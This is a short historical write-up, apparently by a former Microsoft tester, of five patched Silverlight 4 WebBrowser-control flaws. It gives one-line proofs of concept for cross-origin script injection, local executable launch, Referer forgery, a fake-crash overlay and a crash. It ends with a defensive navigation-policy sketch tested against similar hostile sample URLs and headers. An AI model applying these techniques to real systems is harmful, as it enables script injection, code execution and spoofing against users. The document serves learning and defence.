A penetration test of Silverlight 4 uncovered a cluster of serious issues in the WebBrowser control (WebOC) that Silverlight exposed to web content. These ranged from cross-origin script injection to remote code execution. I documented five distinct proof-of-concept scenarios.
PoC I — UXSS via Navigate2 with javascript: URL
wbControl.Navigate2('javascript:alert(document.body.innerText)', 0, 'xdomIFrame');
PoC II — Local File Execution (RCE)
wbControl.Navigate2("file:///c:/windows/system32/calc.exe", "", "ANY_TARGET");
PoC III — Referrer Forgery
wbControl.Navigate2("http://victim.com/", 0, "target", 0,
"Referer:http://www.trusted.com/");
PoC IV — Full-Screen Overlay via createPopup
var a = createPopup();
a.document.body.innerHTML = "<h1>Fake BSOD</h1>";
a.show(0, 0, screen.width, screen.height);
PoC V — DoS via InvokeScript
WBControl.InvokeScript(""); // Crash
The Navigate2 API in the WebOC did not apply the same security restrictions as a normal browser navigation. Passing a javascript: URL together with the name of an IFrame in the hosting page as the target frame (PoC I) navigated that IFrame, with the script running in that IFrame’s security context, bypassing the same-origin policy. The file execution issue was even more direct — the WebOC would happily launch local executables when given a file:// path.
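The check that was missing in PoC I to III, sketched as an added example (not code from the original write-up or from Silverlight): a host-side policy that parses the requested URL, allow-lists the scheme, and refuses caller-supplied headers such as Referer before anything reaches the embedded control. The names checkNavigation, ALLOWED_SCHEMES, FORBIDDEN_HEADERS, SAMPLES and auditSamples are hypothetical, and the sample requests are constructed.

```javascript
// Added example: navigation policy for a host that embeds a browser control.
// All identifiers here are hypothetical; nothing below is Silverlight's API.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
// Headers the calling content must never set itself (PoC III set Referer).
const FORBIDDEN_HEADERS = new Set(["referer", "origin", "host", "cookie"]);

function checkNavigation(rawUrl, extraHeaders = "") {
  let url;
  try {
    // Parse instead of prefix-matching: the WHATWG parser strips leading
    // spaces/control characters and embedded tabs/newlines and lowercases
    // the scheme, so " JaVa\tScRiPt:" is seen as "javascript:".
    url = new URL(String(rawUrl));
  } catch {
    // Relative or malformed input is refused rather than guessed at.
    return { allow: false, reason: "unparseable URL" };
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { allow: false, reason: `scheme ${url.protocol} not allowed` };
  }
  // The headers argument may carry several lines; inspect every one.
  for (const line of String(extraHeaders).split(/[\r\n]+/)) {
    if (!line.trim()) continue;
    const name = line.split(":", 1)[0].trim().toLowerCase();
    if (FORBIDDEN_HEADERS.has(name)) {
      return { allow: false, reason: `header ${name} not allowed` };
    }
  }
  return { allow: true, url: url.href };
}

// Constructed sample requests with the same shapes as PoC I-III.
const SAMPLES = [
  ["javascript:void(0)", ""],
  [" JaVa\tScRiPt:void(0)", ""],
  ["file:///c:/windows/system32/calc.exe", ""],
  ["http://victim.com/", "Referer:http://www.trusted.com/"],
  ["https://example.com/page", "X-Trace: 1"],
];

function auditSamples() {
  return SAMPLES.map(([u, h]) => checkNavigation(u, h).allow);
}
```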
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.